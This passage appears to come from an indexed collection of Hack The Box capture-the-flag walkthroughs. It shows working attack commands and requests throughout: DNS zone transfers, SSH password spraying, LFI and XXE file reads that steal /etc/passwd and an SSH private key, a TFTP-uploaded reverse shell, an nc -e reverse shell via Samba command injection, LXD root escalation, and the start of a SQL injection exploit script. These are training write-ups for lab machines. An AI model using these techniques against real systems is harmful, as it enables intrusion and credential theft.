|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Friend Zone Escape software
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
443/tcp open  ssl/http    Apache httpd 2.4.29
|_http-title: 404 Not Found
| ssl-cert: Subject: commonName=friendzone.red/organizationName=CODERED/stateOrProvinceName=CODERED/countryName=JO
| Not valid before: 2018-10-05T21:02:30
|_Not valid after:  2018-11-04T21:02:30
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Apache/2.4.29 (Ubuntu)
| tls-alpn: 
|_  http/1.1
445/tcp open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Service Info: Hosts: FRIENDZONE, 127.0.1.1; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb2-time: 
|   date: 2023-04-18T22:23:28
|_  start_date: N/A
|_clock-skew: mean: -59m59s, deviation: 1h43m54s, median: 0s
| smb2-security-mode: 
|   311: 
|_    Message signing enabled but not required
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: friendzone
|   NetBIOS computer name: FRIENDZONE\x00
|   Domain name: \x00
|   FQDN: friendzone
|_  System time: 2023-04-19T01:23:29+03:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: FRIENDZONE, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 35.34 seconds
```

Interesting here: port 53 is open. On port 443 you can read:

                        | ssl-cert: Subject: commonName=friendzone.red/organizationName=CODERED/stateOrProvinceName=CODERED/countryName=JO

So we have the domain name friendzone.red. Also, visiting the IP in the browser, there is an info email address with the domain friendzoneportal.red.

                        Enumerating shares in samba:

```bash
smbclient -L 10.129.228.87
smbmap -H 10.129.228.87
```

An alternative is using enum4linux.

                        Checking out each shared folder:

```bash
smbclient \\\\10.129.228.87\\Files
smbclient \\\\10.129.228.87\\print$
smbclient \\\\10.129.228.87\\general
smbclient \\\\10.129.228.87\\Developement
smbclient \\\\10.129.228.87\\IPC$
```

From the general share, inside the smbclient prompt, we can download the file creds.txt:

```bash
dir
mget *
```
                        ","tags":["walkthrough"]},{"location":"htb-friendzone/#transferring-dns-zone","title":"Transferring DNS zone","text":"

Some HackTheBox machines can be exploited via DNS zone transfers:

In the case of Friendzone, the web page accessible on port 80 exposes an email address containing a different domain. Port 53 is also open, which is an indicator of a possible DNS zone transfer.

In Friendzone, we will request a zone transfer for every domain spotted by the different scanners:

```bash
# friendzone.red was spotted in the nmap scan. Requesting the friendzone.red zone from 10.129.228.87:
dig axfr friendzone.red @10.129.228.87

# friendzoneportal.red appeared in the email shown on http://10.129.228.87. Requesting that zone too:
dig axfr friendzoneportal.red @10.129.228.87
```

Add the discovered subdomains to your /etc/hosts.
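For example (a sketch: administrator1.friendzone.red is the host used below; extend the line with whatever other names the zone transfers returned):

```bash
# /etc/hosts entries for the discovered names.
10.129.228.87    friendzone.red friendzoneportal.red administrator1.friendzone.red
```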

Visit https://administrator1.friendzone.red and a login panel is displayed. Use the credentials found in the Samba share. After logging into the application, a message is displayed: "Login Done ! visit /dashboard.php".

                        ","tags":["walkthrough"]},{"location":"htb-funnel/","title":"Walkthrough - A HackTheBox machine - Funnel","text":"

Enumerate ports/services:

```bash
nmap -sV -sC $ip -Pn -p-
```

                        Open ports: 21 and 22.

We can log into FTP with the anonymous user:

```bash
ftp $ip
# enter user when prompted: anonymous
# Press enter when prompted for password.
```

                        In the ftp service there is a directory, mail_backup.

```bash
cd mail_backup
mget *
```

                        Get users from file welcome_28112022

                        • optimus@funnel.htb
                        • albert@funnel.htb
                        • andreas@funnel.htb
                        • christine@funnel.htb
                        • maria@funnel.htb

                        Get default password from file password_policy.pdf: \"funnel123#!#\".

You can use hydra or try them manually. The user that still has the default password set is christine:

```bash
sshpass -p 'funnel123#!#' ssh christine@10.129.228.102
```
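The hydra spray mentioned above could look like this (a sketch; users.txt is a hypothetical file holding the five usernames without the @funnel.htb part):

```bash
# Try the default password against every user over SSH.
hydra -L users.txt -p 'funnel123#!#' ssh://10.129.228.102
```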

Now we can enumerate socket connections with the ss command:

```bash
ss -tl
# -l: Display only listening sockets.
# -t: Display TCP sockets.
```

                        Results:

```
State  Recv-Q Send-Q Local Address:Port       Peer Address:PortProcess 
LISTEN 0      4096   127.0.0.53%lo:domain          0.0.0.0:*           
LISTEN 0      128          0.0.0.0:ssh             0.0.0.0:*           
LISTEN 0      4096       127.0.0.1:postgresql      0.0.0.0:*           
LISTEN 0      4096       127.0.0.1:33599           0.0.0.0:*           
LISTEN 0      32                 *:ftp                   *:*           
LISTEN 0      128             [::]:ssh                [::]:* 
```

PostgreSQL is in use. Since our user is not in the sudoers file and cannot install a PostgreSQL client on the target, we can work around this via port forwarding.

If the tool is not installed, run this on the attacker machine:

```bash
sudo apt install postgresql-client-common
```

                        1. In the attacking machine:

```bash
ssh UserNameInTheAttackedMachine@IPOfTheAttackedMachine -L 1234:localhost:5432
# We listen for incoming connections on our local port 1234. When a client connects to our local port, the SSH client forwards the connection through the tunnel and the remote server delivers it to localhost:5432 on its side. This allows the local client to access services on the remote server as if they were running on the local machine.
# We are forwarding traffic from a local port of our choosing, for instance 1234, to the port PostgreSQL is listening on, namely 5432, on the remote server. We therefore specify port 1234 to the left of localhost, and 5432 to the right, indicating the target port.
```

                        2. In another terminal in the attacking machine:

```bash
sudo apt update && sudo apt install postgresql postgresql-client-common
# this will install postgresql in case you don't have it.

psql -U christine -h localhost -p 1234
# Using our installation of psql, we can now interact with the PostgreSQL service running locally on the target machine:
# -U: to specify user.
# -h: to specify localhost.
# -p 1234: as we are targeting the tunnel we created earlier with SSH, we need to specify the port the tunnel is listening on.
```

Once logged in, use the PostgreSQL cheat sheet to get the flag.

                        ","tags":["walkthrough","postgresql","ftp"]},{"location":"htb-ignition/","title":"Ignition, a Hack The Box Machine","text":"
```bash
nmap -sC -sV $ip -Pn
```

Add ignition.htb to /etc/hosts.

                        Enumerating:

```bash
gobuster dir -u http://ignition.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 40
```

                        Browsing found files and gathering information:

```
/home                 (Status: 200) [Size: 25802]
/contact              (Status: 200) [Size: 28673]
/media                (Status: 301) [Size: 185] [--> http://ignition.htb/media/]
/0                    (Status: 200) [Size: 25803]
/static               (Status: 301) [Size: 185] [--> http://ignition.htb/static/]
/catalog              (Status: 302) [Size: 0] [--> http://ignition.htb/]
/admin                (Status: 200) [Size: 7095]
/Home                 (Status: 301) [Size: 0] [--> http://ignition.htb/home]
/setup                (Status: 301) [Size: 185] [--> http://ignition.htb/setup/]
/checkout             (Status: 302) [Size: 0] [--> http://ignition.htb/checkout/cart/]
/robots               (Status: 200) [Size: 1]
/wishlist             (Status: 302) [Size: 0] [--> http://ignition.htb/customer/account/login/referer/aHR0cDovL2lnbml0aW9uLmh0Yi93aXNobGlzdA%2C%2C/]    
/soap                 (Status: 200) [Size: 391]
```

                        Knowing this we could do a more precise enumeration with:

```bash
gobuster dir -u http://ignition.htb -w /usr/share/wordlists/SecLists-master/Discovery/Web-Content/CMS/sitemap-magento.txt
```

From /admin we reach the login panel of a Magento application. From /setup we obtain the Magento version: dev-2.4-develop.

                        Brute forcing it:

```bash
wfuzz -c -z file,/usr/share/wordlists/SecLists-master/Passwords/Common-Credentials/10-million-password-list-top-100000.txt -d "login%5Busername%5D=admin&login%5Bpassword%5D=FUZZ" http://ignition.htb/admin
```
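As written, wfuzz prints a line for every candidate. Filtering makes the hit stand out (a sketch: the failure string passed to --hs is an assumption, so copy the exact error message the login page returns for a wrong password):

```bash
# Hide responses containing the (assumed) failure message so only the hit remains.
wfuzz -c -z file,/usr/share/wordlists/SecLists-master/Passwords/Common-Credentials/10-million-password-list-top-100000.txt \
      --hs "sign-in was incorrect" \
      -d "login%5Busername%5D=admin&login%5Bpassword%5D=FUZZ" http://ignition.htb/admin
```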

Enter /admin with the credentials. The flag is in the dashboard.

                        ","tags":["walkthrough"]},{"location":"htb-included/","title":"Included - A HackTheBox machine","text":"

                        After running a port scan, the only open port is 80.

```bash
nmap -sC -sV $ip -Pn -p-
```

                        Results:

```
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_Requested resource was http://10.129.95.185/?file=home.php
```

After visiting the site in the browser and examining its code, it's a simple PHP web site. The ?file= endpoint that appears in the scan has an LFI vulnerability, and some files can be read.

                        Burpsuite request:

```
GET /?file=../../../../../../etc/passwd HTTP/1.1
Host: 10.129.95.185
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
```

                        Result:

```
HTTP/1.1 200 OK
Date: Mon, 08 May 2023 07:04:13 GMT
Server: Apache/2.4.29 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 1575
Connection: close
Content-Type: text/html; charset=UTF-8

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
mike:x:1000:1000:mike:/home/mike:/bin/bash
tftp:x:110:113:tftp daemon,,,:/var/lib/tftpboot:/usr/sbin/nologin
```

Something interesting: after the user mike there is a service user, tftp. Trivial File Transfer Protocol (TFTP) is a simple protocol that provides basic file transfer with no user authentication. TFTP is intended for applications that do not need the sophisticated interactions that File Transfer Protocol (FTP) provides. TFTP uses the User Datagram Protocol (UDP) to communicate, a lightweight data transport protocol that works on top of IP.

UDP provides a mechanism to detect corrupt data in packets, but it does not attempt to solve other problems that arise with packets, such as lost or out-of-order packets. It is implemented in the transport layer of the OSI model and is known as a fast but unreliable protocol, unlike TCP, which is reliable but slower than UDP. Just as TCP has well-known ports for protocols such as HTTP, FTP and SSH, UDP has ports for the protocols that run over it.

```bash
sudo nmap -sU 10.129.95.185
```

You can use metasploit (module auxiliary/admin/tftp/tftp_transfer_util) or python to check whether you can upload/download files.
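A quick manual check is also possible with curl, which speaks TFTP (a sketch, assuming your curl build includes TFTP support; test.txt is any local file):

```bash
# Upload a file over TFTP, then fetch it back to confirm read/write access.
curl -s -T test.txt tftp://10.129.95.185/test.txt
curl -s tftp://10.129.95.185/test.txt
```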

You can also exploit it manually. Install a TFTP client:

```bash
# Install tftp client
sudo apt install tftp
```

Also, check the manual for the available commands:

```bash
man tftp
```

                        Upload your pentesmonkey shell with:

```bash
put pentesmonkey.php
```

Where does it get uploaded? It depends, but the default configuration file for tftpd-hpa is /etc/default/tftpd-hpa, and the upload directory is configured there under the parameter TFTP_DIRECTORY=. With that information, you can reach the uploaded file and launch your reverse shell.

                        Let's do it. Request in Burpsuite:

```
GET /?file=../../../../../../etc/default/tftpd-hpa HTTP/1.1
Host: 10.129.95.185
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
```

                        Response:

```
HTTP/1.1 200 OK
Date: Mon, 08 May 2023 07:27:32 GMT
Server: Apache/2.4.29 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 125
Connection: close
Content-Type: text/html; charset=UTF-8

# /etc/default/tftpd-hpa

TFTP_USERNAME="tftp"
TFTP_DIRECTORY="/var/lib/tftpboot"
TFTP_ADDRESS=":69"
TFTP_OPTIONS="-s -l -c"
```

Now, open netcat in one terminal:

```bash
nc -lnvp 1234
```

                        Launch your shell by visiting in the browser:

```
http://10.129.95.185/?file=../../../../../..//var/lib/tftpboot/pentesmonkey.php
```
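The same trigger also works from the command line (keep the netcat listener running; the request blocks while the shell is alive):

```bash
# Including the uploaded file executes it and fires the reverse shell.
curl "http://10.129.95.185/?file=../../../../../../var/lib/tftpboot/pentesmonkey.php"
```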

Spawn and stabilize a shell:

```bash
SHELL=/bin/bash script -q /dev/null   # spawn a PTY-backed bash
# Press Ctrl-Z to background the shell
stty raw -echo                        # pass keystrokes (Ctrl-C, tab completion) straight through
fg                                    # bring the shell back to the foreground
reset                                 # reinitialize the terminal
xterm                                 # terminal type to enter if reset asks for one
```

Browse around. Credentials for the user mike are at /var/www/html/.htpasswd:

```bash
su mike
# Enter password: Sheffield19
```

                        And get the user.txt flag:

```bash
cd
ls -la
cat user.txt
```
                        ","tags":["walkthrough","lxd exploitation","port 69","tftp","privilege escalation"]},{"location":"htb-included/#privilege-escalation","title":"Privilege escalation","text":"
```bash
whoami
pwd
id
groups
uname -a
lsb_release -a
```

                        Information retrieved:

```
uid=1000(mike) gid=1000(mike) groups=1000(mike),108(lxd)
groups
mike lxd
uname -a
Linux included 4.15.0-151-generic #157-Ubuntu SMP Fri Jul 9 23:07:57 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
No LSB modules are available.
Distributor ID: Ubuntu
Description:    Ubuntu 18.04.5 LTS
Release:        18.04
Codename:       bionic
```

After searching for "exploit ubuntu 18.04.5 LTS", there is an exploit that abuses the lxd service, which makes sense given the information retrieved (see the notes about lxd privilege escalation).

                        LXD is a root process that carries out actions for anyone with write access to the LXD UNIX socket. It often does not attempt to match the privileges of the calling user. There are multiple methods to exploit this.

Basically, as mike we belong to the lxd group. Let's exploit this:

                        Steps to be performed on the attacker machine:

```bash
# Download build-alpine on your local machine from the git repository:
git clone https://github.com/saghul/lxd-alpine-builder.git

# Execute the script "build-alpine" to build the latest Alpine image as a compressed file. This step must be executed by the root user:
cd lxd-alpine-builder
sudo ./build-alpine

# This generates a tar file that you need to transfer to the victim machine. For that, you can copy the file to your /var/www/html folder and start the apache2 service.
```

                        Steps to be performed on the victim machine:

```bash
# Download the alpine image. Go, for instance, to the /tmp folder and, if you have started the apache2 service on the attacker machine, do a wget:
wget http://AttackerIP/alpine-v3.17-x86_64-20230508_0532.tar.gz

# After the image is built it can be added as an image to LXD as follows:
lxc image import ./alpine-v3.17-x86_64-20230508_0532.tar.gz --alias myimage

# List available images:
lxc image list

# Initiate your image inside a new privileged container:
lxc init myimage ignite -c security.privileged=true

# Mount the host filesystem at /mnt/root inside the container:
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true

# Start the container:
lxc start ignite

# Launch a shell in the container:
lxc exec ignite /bin/sh
```

                        Now, we should be root:

```bash
whoami
cd /
find . -name root.txt 2>/dev/null
```
                        ","tags":["walkthrough","lxd exploitation","port 69","tftp","privilege escalation"]},{"location":"htb-lame/","title":"HTB Lame","text":"
```bash
# Reconnaissance
nmap -sC -sV $IP -Pn
```

```
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.3.4
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.10.14.2
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 600fcfe1c05f6a74d69024fac4d56ccd (DSA)
|_  2048 5656240f211ddea72bae61b1243de8f3 (RSA)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 2h00m28s, deviation: 2h49m43s, median: 27s
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.20-Debian)
|   Computer name: lame
|   NetBIOS computer name: 
|   Domain name: hackthebox.gr
|   FQDN: lame.hackthebox.gr
|_  System time: 2023-04-18T17:35:18-04:00
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 25444/tcp): CLEAN (Timeout)
|   Check 2 (port 29825/tcp): CLEAN (Timeout)
|   Check 3 (port 9648/udp): CLEAN (Timeout)
|   Check 4 (port 21091/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 17:35
Completed NSE at 17:35, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 17:35
Completed NSE at 17:35, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 17:35
Completed NSE at 17:35, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 69.50 seconds
```
                        ","tags":["walkthrough","smb vulnerability","metasploit"]},{"location":"htb-lame/#enumeration","title":"Enumeration","text":"

                        Samba smbd 3.0.20-Debian is vulnerable.

```bash
smbclient -L \\$IP
```

                        And enumerate shared resources:

```bash
smbmap -H $IP
```

Results:

```
[+] IP: 10.129.228.86:445       Name: unknown                                           
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        print$                                                  NO ACCESS       Printer Drivers
        tmp                                                     READ, WRITE     oh noes!
        opt                                                     NO ACCESS
        IPC$                                                    NO ACCESS       IPC Service (lame server (Samba 3.0.20-Debian))
        ADMIN$                                                  NO ACCESS       IPC Service (lame server (Samba 3.0.20-Debian))
```

                        tmp share has READ and WRITE permissions.

```bash
msfconsole
use exploit/multi/samba/usermap_script
# configure it and run it
```
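The same bug (the "username map script" command injection, CVE-2007-2447) can also be triggered without metasploit. A sketch, assuming the target's nc supports -e; swap in your own attacker IP and port:

```bash
# On the attacker machine, start a listener.
nc -lnvp 4444

# Connect to the writable share without credentials:
smbclient //$IP/tmp -N
# At the smb: \> prompt, the "logon" command sends a crafted username
# containing shell metacharacters, which Samba passes to a shell:
logon "/=`nohup nc -e /bin/sh 10.10.14.2 4444`"
```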
                        ","tags":["walkthrough","smb vulnerability","metasploit"]},{"location":"htb-markup/","title":"Markup - A HTB machine","text":"
```bash
nmap -sC -A 10.129.95.192 -Pn
```

                        Open ports: 22, 80 and 443.

In the browser, there is a login panel. Try typical credentials: admin and password work.

                        Locate the form to order an item. Capture the request with burp:

```
POST /process.php HTTP/1.1
Host: 10.129.95.192
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: text/xml
Content-Length: 108
Origin: http://10.129.95.192
Connection: close
Referer: http://10.129.95.192/services.php
Cookie: PHPSESSID=1gjqt353d2lm5222nl3ufqru10

<?xml version = "1.0"?><order><quantity>2</quantity><item>Home Appliances</item><address>1</address></order>
```

Playing around with the request (for instance, nesting some XML), you can check that it's possible to escape the XML tags. This request is vulnerable to XML external entity (XXE) injection.

From some responses like the one below (and also from the nmap scan) you know that the server runs on Windows:

```
:  DOMDocument::loadXML(): Opening and ending tag mismatch: order line 1 and item in Entity, line: 1 in <b>C:\xampp\htdocs\process.php
```

Also, from the source code you know there might be a user called daniel.

As a possible exploitation path, we can check whether there is an SSH private key saved in that user's folder.

```
POST /process.php HTTP/1.1
Host: 10.129.95.192
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: text/xml
Content-Length: 182
Origin: http://10.129.95.192
Connection: close
Referer: http://10.129.95.192/services.php
Cookie: PHPSESSID=1gjqt353d2lm5222nl3ufqru10

<?xml version = "1.0"?><!DOCTYPE root [<!ENTITY test SYSTEM 'file:///c:/users/daniel/.ssh/id_rsa'>]>
<order><quantity>2</quantity><item>
&test;
</item><address>1</address></order>
```

The response contains the id_rsa private key. More about XXE attacks in the notes.
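The same request can be replayed with curl (a sketch; the PHPSESSID value is session-specific, so use your own):

```bash
# XXE: the external entity pulls daniel's SSH private key into the response.
curl -s 'http://10.129.95.192/process.php' \
     -H 'Content-Type: text/xml' \
     -b 'PHPSESSID=1gjqt353d2lm5222nl3ufqru10' \
     --data '<?xml version="1.0"?><!DOCTYPE root [<!ENTITY test SYSTEM "file:///c:/users/daniel/.ssh/id_rsa">]><order><quantity>2</quantity><item>&test;</item><address>1</address></order>'
```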

                        Now, as port 22 was open:

```bash
ssh -i id_rsa daniel@10.129.95.192
```

user.txt is on the Desktop.

                        ","tags":["walkthrough","windows","xxe"]},{"location":"htb-metatwo/","title":"Walkthrough - Metatwo, a Hack The Box machine","text":"","tags":["walkthrough"]},{"location":"htb-metatwo/#about-the-machine","title":"About the machine","text":"data Machine Metatwo Platform Hackthebox url link creator Naute OS Linux Release data 29 october 2022 Difficulty Easy Points 20 ip 10.10.11.186","tags":["walkthrough"]},{"location":"htb-metatwo/#getting-usertxt-flag","title":"Getting user.txt flag","text":"

                        Run:

```bash
export ip=10.10.11.186
```
                        ","tags":["walkthrough"]},{"location":"htb-metatwo/#reconnaissance","title":"Reconnaissance","text":"","tags":["walkthrough"]},{"location":"htb-metatwo/#active-scanning-serviceport-enumeration","title":"Active Scanning: Service/Port enumeration","text":"

Run nmap to enumerate open ports, services, OS, and traceroute. A general scan first, so as not to make too much noise:

```bash
sudo nmap $ip -Pn
```

                        Results:

```
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http
```

Open 10.10.11.186 in the browser. A redirection to http://metapress.htb occurs, but the server is not found, so we add this mapping to our /etc/hosts file.

                        Open the /etc/hosts file with an editor. For instance, nano.

```bash
sudo nano /etc/hosts
```

Move the cursor to the end and add this line:

```
10.10.11.186    metapress.htb
```

Now we can visit the site. The first thing we notice is that it is WordPress, which means we can use a tool such as wpscan to enumerate resources on the target. Since we also want to know the installed plugins, we will perform an aggressive scan with the flag --plugins-detection.

                        First, do the generic scan:

```bash
wpscan --url http://metapress.htb
```

                        Results:

```
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://metapress.htb/ [10.10.11.186]
[+] Started: Sun Nov 13 14:58:36 2022

Interesting Finding(s):

[+] Headers
 | Interesting Entries:
 |  - Server: nginx/1.18.0
 |  - X-Powered-By: PHP/8.0.24
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] robots.txt found: http://metapress.htb/robots.txt
 | Interesting Entries:
 |  - /wp-admin/
 |  - /wp-admin/admin-ajax.php
 | Found By: Robots Txt (Aggressive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://metapress.htb/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://metapress.htb/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://metapress.htb/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.6.2 identified (Insecure, released on 2021-02-22).
 | Found By: Rss Generator (Passive Detection)
 |  - http://metapress.htb/feed/, <generator>https://wordpress.org/?v=5.6.2</generator>
 |  - http://metapress.htb/comments/feed/, <generator>https://wordpress.org/?v=5.6.2</generator>

[+] WordPress theme in use: twentytwentyone
 | Location: http://metapress.htb/wp-content/themes/twentytwentyone/
 | Last Updated: 2022-11-02T00:00:00.000Z
 | Readme: http://metapress.htb/wpcontent/themes/twentytwentyone/readme.txt
 | [!] The version is out of date, the latest version is 1.7
 | Style URL: http://metapress.htb/wp-content/themes/twentytwentyone/style.css?ver=1.1
 | Style Name: Twenty Twenty-One
 | Style URI: https://wordpress.org/themes/twentytwentyone/
 | Description: Twenty Twenty-One is a blank canvas for your ideas and it makes the block editor your best brush. Wi...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 | Confirmed By: Css Style In 404 Page (Passive Detection)
 |
 | Version: 1.1 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://metapress.htb/wp-content/themes/twentytwentyone/style.css?ver=1.1, Match: 'Version: 1.1'

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:11 <========================================================> (137 / 137) 100.00% Time: 00:00:11

[i] No Config Backups Found.

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
```

                        Two interesting facts that may come into use later are:

                        • WordPress version 5.6.2 identified (Insecure, released on 2021-02-22).
                        • X-Powered-By: PHP/8.0.24

So we have WordPress 5.6.2 running on PHP 8.0.24.

                        After this, use the aggressive method to scan plugins:

```bash
wpscan --url http://metapress.htb --enumerate vp --plugins-detection aggressive
```

Since this method is really slow, we have some spare time to look at the HTML code with the browser's inspector tool. This specific line catches our attention:

                        <link rel=\"stylesheet\" id=\"bookingpress_fonts_css-css\" href=\"http://metapress.htb/wp-content/plugins/bookingpress-appointment-booking/css/fonts/fonts.css?ver=1.0.10\" media=\"all\">\n

Sweet. Very easily, we've been able to spot an installed plugin and its version: BookingPress 1.0.10. Browsing the site, it's easy to get to http://metapress.htb/events/. BookingPress 1.0.10 is vulnerable, so the next step is exploitation.

                        ","tags":["walkthrough"]},{"location":"htb-metatwo/#initial-access","title":"Initial access","text":"

                        By searching for \"bookingpress 1.0.10\" in google, we can learn that there is a critical vulnerability associated with the plugin BookingPress version under 1.0.11.

                        Description of CVE-2022-0739: The plugin fails to properly sanitize user supplied POST data before it is used in a dynamically constructed SQL query via the bookingpress_front_get_category_services AJAX action (available to unauthenticated users), leading to an unauthenticated SQL Injection.

                        We are going to exploit the vulnerability in three different ways:

                        • Using a python script.
                        • Using the curl command.
                        • Using a capture in Burp Suite.

We will mostly leave the tool sqlmap, which automates the attack, out of this write-up. Let's get our hands dirty with code.

Python script. There is a git repo with an exploit for CVE-2022-0739.

                        Let's see the python script:

```python
import requests
from json import loads
from random import randint
from argparse import ArgumentParser

p = ArgumentParser()
p.add_argument('-u', '--url', dest='url', help='URL of wordpress server with vulnerable plugin (http://example.domain)', required=True)
p.add_argument('-n', '--nonce', dest='nonce', help='Nonce that you got as unauthenticated user', required=True)

trigger = ") UNION ALL SELECT @@VERSION,2,3,4,5,6,7,count(*),9 from wp_users-- -"
